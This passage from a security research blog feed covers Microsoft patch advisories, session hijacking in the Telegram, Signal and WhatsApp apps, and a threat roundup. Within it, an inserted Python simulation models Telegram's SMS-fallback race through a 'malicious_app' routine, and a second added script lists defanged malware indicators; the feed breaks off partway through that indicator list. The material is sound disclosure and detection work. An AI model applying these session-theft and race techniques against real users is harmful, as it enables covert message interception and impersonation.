hosts the Internet Explorer rendering engine.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8628">CVE-2018-8628</a> is a remote code execution vulnerability in Microsoft PowerPoint that lies in the way the software processes objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted, malicious PowerPoint file, which would eventually grant them the ability to execute code remotely in the context of the current user. 
The Preview Pane is not an attack vector for this vulnerability — the user must open the file in PowerPoint.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8643">CVE-2018-8643</a> is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in Internet Explorer. An attacker could exploit this bug by tricking a user into visiting a specially crafted web page in Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. If successful, the attacker could then corrupt memory in such a way that they could execute arbitrary code in the context of the current user.<br /><br />The other important vulnerabilities in this release are:<br /><ul style="text-align: left;"><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8477">CVE-2018-8477</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8514">CVE-2018-8514</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8517">CVE-2018-8517</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8580">CVE-2018-8580</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8595">CVE-2018-8595</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8596">CVE-2018-8596</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8598">CVE-2018-8598</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8599">CVE-2018-8599</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8604">CVE-2018-8604</a></li><li><a 
href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8611">CVE-2018-8611</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8612">CVE-2018-8612</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8614">CVE-2018-8614</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8616">CVE-2018-8616</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8621">CVE-2018-8621</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8622">CVE-2018-8622</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8627">CVE-2018-8627</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8630">CVE-2018-8630</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8635">CVE-2018-8635</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8637">CVE-2018-8637</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8638">CVE-2018-8638</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639">CVE-2018-8639</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8643">CVE-2018-8643</a></li></ul><h3 style="text-align: left;">Coverage</h3>In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. 
Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.<br /><br />Snort rules: 45142, 45143, 48509, 48510, 48513 - 48520, 48531 - 48534, 48559, 48562</div>2018-12-13T14:16:34.868-05:000https://blog.talosintelligence.com/2018/12/microsoft-patch-tuesday-december-2018.htmlin(Secure) messaging apps — How side-channel attacks can compromise privacy in WhatsApp, Telegram, and Signalhttp://feedproxy.google.com/~r/feedburner/Talos/~3/RBmLA4Qd1ho/secureim.htmlsecure instant messagingsignalTalosTALOS-2018-0643telegramwhatsappnoreply@blogger.com (Vitor Ventura)Mon, 10 Dec 2018 08:51:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-1965104554387511859This blog post is authored by&nbsp;<a href="https://twitter.com/_vventura" style="font-size: medium; font-weight: 400;">Vitor Ventura</a><span style="font-size: small; font-weight: 400;">.</span><br /><h3>Executive summary</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">Messaging applications have been around since the inception of the internet. But recently, due to the increased awareness around mass surveillance in some countries, more users are installing end-to-end encrypted apps dubbed "secure instant messaging applications." 
These apps claim to encrypt users' messages and keep their content secure from any third parties.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">However, after a deep dive into three of these secure messaging apps — Telegram, WhatsApp and Signal — we discovered that these services may not fulfill the promises they are meant to keep by putting users' confidential information at risk.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This is a serious problem, considering users download these apps in the hopes that their photos and messages will stay completely protected from third parties. These apps, which have countless users, cannot assume that their users are security educated and understand the risk of enabling certain settings on their device. As such, they have an obligation to explain the risks to users, and when possible, adopt safer defaults in their settings. In this post, we will show how an attacker could compromise these applications by performing side-channel attacks that target the operating system these apps delegated their security to. This post will dive into the methods in which these apps handle users' data. It will not include deep technical analysis of these companies' security.</div></div><a name='more'></a><h3>Secure messaging applications</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">The concept behind secure messaging apps is that the content of all communication is encrypted between users without third parties involved. This means the service provider should not be able to read the content at any point. 
</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">To achieve end-to-end encryption, these applications either developed their own cryptographic protocol or adopted a third-party one. There are two main protocols these apps usually use: MT Protocol, developed by the secure messaging app Telegram, and Signal Protocol, developed by the software firm Open Whisper Systems. Since the MT Protocol implementation is not open-source, most of the remaining applications either use Signal Protocol or implemented a variation of it. Other applications, which are beyond the scope of this post, use this protocol upon request from the user, but not by default. That is the case of both Facebook Messenger, which utilizes a feature known as "Secret Conversations," and Google Allo, which has a feature called "Incognito" chats. In both protocols, the cryptographic implementation has been highly scrutinised by the security community. Researchers in the past have analyzed publicly available source code and performed black-box analysis on real-time communication data.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">However, a secure messaging application is much more than the cryptographic protocol. There are other components, such as the UI framework, file storage model and group enrollment mechanisms, all of which could be used as an attack vector. The <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/">vulnerability</a> CVE-2018-1000136 found in the Electron framework, which is used by both WhatsApp and Signal to build their user interface, is a good example of this. 
This vulnerability, in a worst case scenario, could allow an attacker to execute code remotely or could be used to copy messages.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">These protocols are focused on keeping communications private while in transit. However, they usually provide no assurances about security while the data is processing or when the message reaches the user's device. These protocols also don't manage group enrollment on these applications, as evidenced by the <a href="https://www.wired.com/story/whatsapp-security-flaws-encryption-group-chats/">recent vulnerability</a> found in WhatsApp. If an attacker compromises a WhatsApp server, they could add new members to a group without the group administrator's approval, allowing them to read new messages. This means there's the potential for a motivated actor to pick and choose specific WhatsApp groups to eavesdrop on, breaking the common understanding that this application provides bulletproof end-to-end encryption on all communications. </div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-qg8444j9s7w/XA6NEN9J2kI/AAAAAAAAAVs/xhKhzzb7VlwPHx2nKCX_s5MdoufdoSJVwCK4BGAYYCw/s1600/image5.png" imageanchor="1"><img border="0" height="400" src="https://2.bp.blogspot.com/-qg8444j9s7w/XA6NEN9J2kI/AAAAAAAAAVs/xhKhzzb7VlwPHx2nKCX_s5MdoufdoSJVwCK4BGAYYCw/s400/image5.png" width="390" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">A presentation from Signal pledges to keep users' messages secure.</div></div><div style="text-align: center;"><div style="text-align: left;">Source: http://www.signal.org</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Behind the technical aspects of these applications is also an essential human aspect. 
</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">All of these applications advertise themselves as secure and privacy-minded. Some of them even go as far as to state that they are "safe from hacker attacks." All these statements are meant to create trust between the users and the application. Users trust that the applications will keep their private data safe.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">Given that all of these applications claim to have millions of active users, it is clear that not all of these users will be cyber security-educated. As such, most of them won't have a full understanding of the risks and limitations posed by certain configurations on these applications. Keeping a person's privacy safe is more than just technology, it's also about providing the users with the correct information in a manner that they are able to understand the risks of their decisions, even without being security experts.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-O9whtnlLRUg/XA6NPxdhGaI/AAAAAAAAAV0/LrJtPzCXexw5rkakw8mocpGCb9BEatp5wCK4BGAYYCw/s1600/image8.png" imageanchor="1"><img border="0" height="370" src="https://1.bp.blogspot.com/-O9whtnlLRUg/XA6NPxdhGaI/AAAAAAAAAV0/LrJtPzCXexw5rkakw8mocpGCb9BEatp5wCK4BGAYYCw/s400/image8.png" width="400" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">A Telegram advertisement states that it will keep users' messages "safe from hacker attacks."</div></div><div style="text-align: center;"><div style="text-align: left;">Source: <a href="http://www.telegram.com/">http://www.telegram.com</a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Another significant feature that is 
advertised on these apps is their multi-platform capability. All apps support the major mobile device platforms and a desktop version. The typical user will rightfully believe that the security level is the same on all platforms. All the applications' websites present the idea that the security, privacy and platforms are kept at the same level.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-fUZLDpMiyH8/XA6NkNa1HsI/AAAAAAAAAWA/_Kb6vXEjD8sGq6LGUJ7XFc8P3z5Pep9egCK4BGAYYCw/s1600/image7.png" imageanchor="1"><img border="0" height="291" src="https://2.bp.blogspot.com/-fUZLDpMiyH8/XA6NkNa1HsI/AAAAAAAAAWA/_Kb6vXEjD8sGq6LGUJ7XFc8P3z5Pep9egCK4BGAYYCw/s400/image7.png" width="400" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">This Signal advertisement shows users that they can use the app on various platforms.</div></div><div style="text-align: center;"><div style="text-align: left;">Source: <a href="http://www.signal.org/">http://www.signal.org</a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Implementing security features tends to vary between these various platforms. Some platforms have more risks than others, and these risks need to be communicated to the users, since they will usually assume that each platform provides the same level of security protection.</div></div><h3>The problem</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">The majority of these applications' users are not cybersecurity educated, which means they blindly trust these applications to keep their information safe and secure. 
It is clear that the source of such trust is the way the applications advertise their services.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">On May 16, 2018, Talos published an article on <a href="https://blog.talosintelligence.com/2018/05/telegrab.html">Telegrab</a>, a malware that can hijack sessions from Telegram. The concept is simple: If an attacker can copy the session tokens from a desktop user, then they will be able to hijack the session. The attacker won't need anything else other than the information that is stored locally. It doesn't matter if the information is encrypted or not — by copying this information, the attacker will be able to use it to create a shadow session.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">Following up on that research, we decided to check if the same technique was also applicable to other messaging applications, which was proven to be correct on all tested applications (Telegram, Signal, WhatsApp). Not all of these applications handle sessions in the same way, which leads to different consequences when this attack is carried out. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">In the next section, we will describe some of these attack scenarios where the sessions of these applications can be replicated or hijacked.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><h2>Applications</h2><h3 id="h.2et92p0">Telegram — Desktop session hijacking</h3><div><br /></div>Telegram seems to be the application where session hijacking is most likely to happen without users having any kind of indication that the attack occurred. 
Messages and images that are sent or received by the victim are replicated into the attacker's session. <br /><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-Y0BuRAXnbGk/XA6N_KNxdTI/AAAAAAAAAWM/OCNX3RYGlJYY2T_TrSwGy8MkFu4OG3zmACK4BGAYYCw/s1600/image3.png" imageanchor="1"><img border="0" height="400" src="https://2.bp.blogspot.com/-Y0BuRAXnbGk/XA6N_KNxdTI/AAAAAAAAAWM/OCNX3RYGlJYY2T_TrSwGy8MkFu4OG3zmACK4BGAYYCw/s400/image3.png" width="287" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Dual sessions on Telegram desktop environments.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Once the attacker starts the Telegram desktop application using the stolen session information, a new session is established without giving any warning to the user. The user has to check if there is an additional session in use. This is carried out by navigating through the settings, which isn't obvious to the average user. When the message does show up on Telegram, it isn't obvious to the average user, either.</div></div><h3 id="h.tyjcwt">Signal — Desktop session hijacking</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">Signal handles the session hijacking as a race condition. When the attacker starts the application using the stolen session information, they both compete for the session. As a result, the user will see error messages on the desktop application, but not the mobile device. 
</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://4.bp.blogspot.com/-Xm9q-_rPiFw/XA6OakOdtGI/AAAAAAAAAWY/qfEGU6acD_gUXdPJO4HY2dVn3UPtxUeFgCK4BGAYYCw/s1600/image2.png" imageanchor="1"><img border="0" height="354" src="https://4.bp.blogspot.com/-Xm9q-_rPiFw/XA6OakOdtGI/AAAAAAAAAWY/qfEGU6acD_gUXdPJO4HY2dVn3UPtxUeFgCK4BGAYYCw/s640/image2.png" width="640" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Sessions created on Mac will work on Windows and vice-versa.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">By the time the victim sees these errors, the attacker already has access to all contacts and to every previous chat that was not deleted.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">To avoid the race condition altogether, the attacker can simply delete the victim's local session information. The next time the user starts the application, it asks to be re-linked.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">For a security expert, this would be a red flag. 
But the average user may think it is just an error in the application.</div></div><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-XftY4Dn-wJQ/XA6O8SDAzsI/AAAAAAAAAWw/kiZODVzcrvARqVyxpNrRGt8LT5X3ZuYtwCK4BGAYYCw/s1600/image9.jpg" imageanchor="1"><img border="0" height="400" src="https://2.bp.blogspot.com/-XftY4Dn-wJQ/XA6O8SDAzsI/AAAAAAAAAWw/kiZODVzcrvARqVyxpNrRGt8LT5X3ZuYtwCK4BGAYYCw/s400/image9.jpg" width="225" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Two sessions for the same device.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">When the user re-links and thereby creates a second session, the two sessions are visible only from the mobile device, and by default they carry the same name, so nothing distinguishes the attacker's session from the legitimate one. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">The attacker can therefore read all messages and even impersonate the victim. Messages sent by the attacker also reach the victim's legitimate devices, but the attacker can delete them as they are sent, avoiding detection. If the impersonation uses the "Disappearing messages" feature, the imitation is even harder for the victim to spot.</div></div><h3 id="h.botsrppqptqr">WhatsApp — Desktop session hijacking</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">WhatsApp is the only one of the three applications that notifies the user when a second desktop session is opened. 
Under normal operation, if an attacker uses the stolen session information, the victim should receive a warning like the one in the image below.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-IH7gI_KnwPY/XA6PFojOaGI/AAAAAAAAAW4/6sT5QR22JCkrCxQZMMjUdx2rgHq5LlMfgCK4BGAYYCw/s1600/image1.png" imageanchor="1"><img border="0" height="397" src="https://1.bp.blogspot.com/-IH7gI_KnwPY/XA6PFojOaGI/AAAAAAAAAW4/6sT5QR22JCkrCxQZMMjUdx2rgHq5LlMfgCK4BGAYYCw/s400/image1.png" width="400" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">WhatsApp multiple login notice.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">This notice pops up in the desktop application that is online when the second session is created, and the second session stays live and usable until the user makes a decision. So by the time the notice appears, the attacker already has access to all of the victim's contacts and previous messages, and can impersonate the victim until the message box is answered. If the victim is away from the terminal, the attacker keeps that access until the victim comes back. The victim gets no obvious warning on the mobile device about what happened. This is the same notice the victim sees in normal use of the desktop client. 
A second session, legitimate or not, does not change the warning.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">This warning mechanism has a flaw: an attacker can bypass it by following the procedure below.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://3.bp.blogspot.com/-IxPrp_BWnfU/XA6PPgj0qII/AAAAAAAAAXE/K1kjeTceRPARTaFxjPSbzid7yzWUa4C7gCK4BGAYYCw/s1600/image4.png" imageanchor="1"><img border="0" height="539" src="https://3.bp.blogspot.com/-IxPrp_BWnfU/XA6PPgj0qII/AAAAAAAAAXE/K1kjeTceRPARTaFxjPSbzid7yzWUa4C7gCK4BGAYYCw/s640/image4.png" width="640" /></a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">The attacker can simplify the procedure by skipping step 4 and waiting before executing step 5. The result is the same, since they get access to the same messages. The attacker only loses access if the victim manually terminates the session from the mobile device.</div><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This vulnerability was disclosed to Facebook according to our coordinated disclosure policy. All the advisory details can be found <a href="https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0643">here</a>.&nbsp;</div></div><h3 id="h.ezyjfzr0vkky">Telegram — Mobile session shadowing</h3><div><br /></div>Session abuse is not only a desktop problem. 
Cloned mobile applications abuse these sessions in the wild.<br /><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-CfpynEtGXm4/XA6PZCXEGlI/AAAAAAAAAXQ/FMqiLs6IU6QU-emz-lmldv3KhqMVsDpFQCK4BGAYYCw/s1600/image6.png" imageanchor="1"><img border="0" height="400" src="https://1.bp.blogspot.com/-CfpynEtGXm4/XA6PZCXEGlI/AAAAAAAAAXQ/FMqiLs6IU6QU-emz-lmldv3KhqMVsDpFQCK4BGAYYCw/s400/image6.png" width="206" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Shadow sessions on a mobile device.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">On mobile devices, the session data itself is much harder for an attacker to obtain under normal circumstances, so users need not be as concerned about it being copied. The fundamental problem is that Telegram allows shadow sessions for the same phone number to coexist on the same device, each handled by a different application.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This enables an attack in which a cloned application reads all Telegram messages and contacts until its session is terminated, and on mobile devices sessions are never terminated unless the user explicitly ends them through the options menu.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">There is another scenario on the Android platform, in which a malicious application can create a shadow session without any user intervention. 
The malicious application only needs the "read SMS" and "kill background process" permissions. Users rarely treat either as a red flag (Android classifies READ_SMS as a dangerous permission and prompts for it at runtime on Android 6.0 and later, but users grant it routinely), and an app requesting them could easily pass Google Play store verification.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">The Telegram registration process starts by requesting a phone number, which is confirmed through an SMS containing a unique code. If a user tries to register the same phone number again, Telegram sends the code over the Telegram channel instead of by SMS. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This change of delivery channel, from SMS to Telegram message, should prevent a malicious application from creating a shadow session without user interaction, since it cannot read the code. However, if the registration is not completed within a specific time frame, Telegram assumes the user no longer has access to the Telegram application and sends a new code over SMS. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This fallback creates a race condition that a malicious application holding the two permissions above can exploit, so that a shadow session is created without any user interaction. 
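</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">To make the race concrete, here is an added simulation in Python. It is not Telegram's code and not the malicious application from the wild; the 120-second window, the class and function names, and the way the "kill background process" permission is used (stopping the real client so the in-app code is never displayed or acted on) are assumptions made here. It models the server side of the flow as described above, a handset with an in-app inbox and an SMS inbox, and a malicious application that can only read the SMS inbox and stop the real client. The hardened variant refuses the SMS downgrade while the number already has a live session, which removes the race.</div></div><br />

```python
"""Added simulation of the registration-code fallback race described above.
Not Telegram's code: the timeout value, the names and the use of the
"kill background process" permission are assumptions made here."""
from __future__ import annotations

import secrets
from dataclasses import dataclass, field

FALLBACK_TIMEOUT = 120.0  # seconds; the post only says "a specific time frame" (assumed value)


@dataclass
class Phone:
    """Simulated handset: the real client's inbox and the SMS inbox."""
    number: str
    app_running: bool = True
    app_inbox: list[str] = field(default_factory=list)  # codes pushed over the Telegram channel
    sms_inbox: list[str] = field(default_factory=list)  # codes delivered by SMS (READ_SMS sees these)


@dataclass
class Pending:
    code: str
    sent_at: float
    channel: str  # "app" or "sms"


class RegistrationService:
    """Server side of the flow. sms_fallback=True reproduces the behaviour the post describes."""

    def __init__(self, sms_fallback: bool = True):
        self.sms_fallback = sms_fallback
        self.sessions: dict[str, set[str]] = {}  # phone number -> device ids holding a session
        self.pending: dict[str, Pending] = {}

    @staticmethod
    def _new_code() -> str:
        return f"{secrets.randbelow(100000):05d}"

    def request_code(self, phone: Phone, now: float) -> str:
        """Registered numbers get the code in-app; new numbers get it by SMS. Returns the channel."""
        code = self._new_code()
        if self.sessions.get(phone.number):
            if phone.app_running:
                phone.app_inbox.append(code)  # a killed client never displays it
            self.pending[phone.number] = Pending(code, now, "app")
            return "app"
        phone.sms_inbox.append(code)
        self.pending[phone.number] = Pending(code, now, "sms")
        return "sms"

    def tick(self, phone: Phone, now: float) -> None:
        """Called as time passes: an in-app code left unconfirmed past the window is re-sent by SMS."""
        p = self.pending.get(phone.number)
        if p is None or p.channel != "app" or now - p.sent_at < FALLBACK_TIMEOUT:
            return
        if not self.sms_fallback:
            return  # hardened: never downgrade to SMS while the number has a live session
        code = self._new_code()
        phone.sms_inbox.append(code)
        self.pending[phone.number] = Pending(code, now, "sms")

    def confirm(self, number: str, code: str, device_id: str) -> bool:
        """Correct code -> a new session for device_id alongside the existing ones."""
        p = self.pending.get(number)
        if p is None or not secrets.compare_digest(p.code, code):
            return False
        del self.pending[number]
        self.sessions.setdefault(number, set()).add(device_id)
        return True


def malicious_app(service: RegistrationService, phone: Phone, start: float = 0.0) -> bool:
    """Attacker path: it can stop the real client and read SMS, and never sees app_inbox."""
    phone.app_running = False  # "kill background process": the in-app code and prompt are never shown
    service.request_code(phone, start)
    already_seen = len(phone.sms_inbox)
    for t in range(1, int(FALLBACK_TIMEOUT) + 2):  # poll until just past the window
        service.tick(phone, start + t)
        if len(phone.sms_inbox) > already_seen:  # "read SMS": the fallback code arrived
            return service.confirm(phone.number, phone.sms_inbox[-1], "shadow-app")
    return False


def run_scenario(hardened: bool) -> tuple[bool, set[str]]:
    """Victim already holds a session; returns (shadow session created?, sessions on the number)."""
    service = RegistrationService(sms_fallback=not hardened)
    phone = Phone("+15555550100")  # constructed number
    service.sessions[phone.number] = {"victim-app"}
    created = malicious_app(service, phone)
    return created, set(service.sessions[phone.number])


if __name__ == "__main__":
    print("as described:", run_scenario(hardened=False))  # True, victim-app plus shadow-app
    print("hardened    :", run_scenario(hardened=True))   # False, victim-app only
```

<br /><div style="text-align: justify;"><div style="text-align: left;">In the first run the shadow session is created without the victim typing anything, and the in-app inbox stays empty throughout, because the simulated malware never receives a code over the Telegram channel; it only needs the fallback. In the hardened run the fallback never comes and the malicious application gives up. The trade-off of that hardening is that a user who genuinely lost access to the registered client needs another recovery path, one that involves the existing session or the account owner rather than an SMS that any app with "read SMS" can see.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">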
This entire process is outlined below.</div></div><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-2zI0D7Xffr0/XA-NZ6mokUI/AAAAAAAAAX4/2J4veh3fiyow3dCeBJOR7SQLyawADCG7wCK4BGAYYCw/s1600/image10.png" imageanchor="1"><img border="0" height="412" src="https://1.bp.blogspot.com/-2zI0D7Xffr0/XA-NZ6mokUI/AAAAAAAAAX4/2J4veh3fiyow3dCeBJOR7SQLyawADCG7wCK4BGAYYCw/s640/image10.png" width="640" /></a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">From this point on, the malicious application has access to all contacts and to all past and future messages except those in "Secret chats."</div></div><h3>Conclusion</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">Secure instant messaging applications have a solid track record of protecting information in transit, even going as far as protecting it from their own servers. However, they fall short when it comes to protecting application state and user information at rest, delegating that protection to the operating system.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">The Signal protocol developers anticipated this kind of session hijacking. 
The security considerations of its session management protocol (the <a href="https://signal.org/docs/specifications/sesame/">Sesame protocol</a>) contain a section dedicated to device compromise, which states, "Security is catastrophically compromised if an attacker learns a device's secret values, such as the identity private key and session state."</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">Since the protocol's own designers foresaw this attack vector, individual users and corporations should be aware that these applications are not risk free. Companies that use these apps to transmit private and sensitive information should therefore employ endpoint protection that guards the locally stored session state, since the applications themselves do not. </div></div><br />2018-12-13T15:49:01.287-05:000https://blog.talosintelligence.com/2018/12/secureim.htmlThreat Roundup for Nov. 30 to Dec. 
7http://feedproxy.google.com/~r/feedburner/Talos/~3/mSGJhY1Js_0/threat-roundup-1130-1207.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 07 Dec 2018 11:44:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-987875845700548779<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 30 and Dec. 07. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.</div></div><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. 
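<br /><br />One way to put that rule into practice, as an added example that is not part of the original roundup: the Python below refangs a subset of the Sload and Emotet indicators listed further down in this post and hunts for them in constructed log lines, raising an alert only when more than one indicator type from the same cluster shows up on the same host. The key=value log format, the host names, and the expansions of the %WinDir%, %TEMP% and %LocalAppData% placeholders are assumptions made for the demonstration.<br />

```python
"""Added example: refang the roundup's defanged indicators and hunt for them in
constructed log lines, alerting only when more than one indicator type from the
same cluster lands on one host. Log format, host names and the placeholder
expansions are assumptions for the demonstration."""
import re
from collections import defaultdict


def refang(s: str) -> str:
    """Undo the usual defanging: 216[.]239[.]34[.]21 -> 216.239.34.21, hxxp -> http."""
    return re.sub(r"^hxxp", "http", s.replace("[.]", "."), flags=re.IGNORECASE)


# A subset of the indicators listed in this post, exactly as defanged there.
IOCS = {
    "Xls.Downloader.Sload-6774021-0": {
        "ip": {"216[.]239[.]34[.]21", "64[.]210[.]137[.]102"},
        "domain": {"ipinfo[.]io", "images2[.]imgbox[.]com"},
        "mutex": {"KYTransactionServer.MutexObject.Administrator"},
        "path": {r"%LocalAppData%\Temp\psefaeec.nvt.psm1"},
    },
    "Doc.Downloader.Emotet-6765662-0": {
        "ip": {"144[.]217[.]184[.]168", "77[.]221[.]130[.]34"},
        "domain": {"ejercitodemaquinas[.]com", "jsplivenews[.]com"},
        "path": {r"%WinDir%\SysWOW64\YC4GWpe1p4Ot.exe", r"%TEMP%\GmP.exe"},
        "sha256": {"6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921"},
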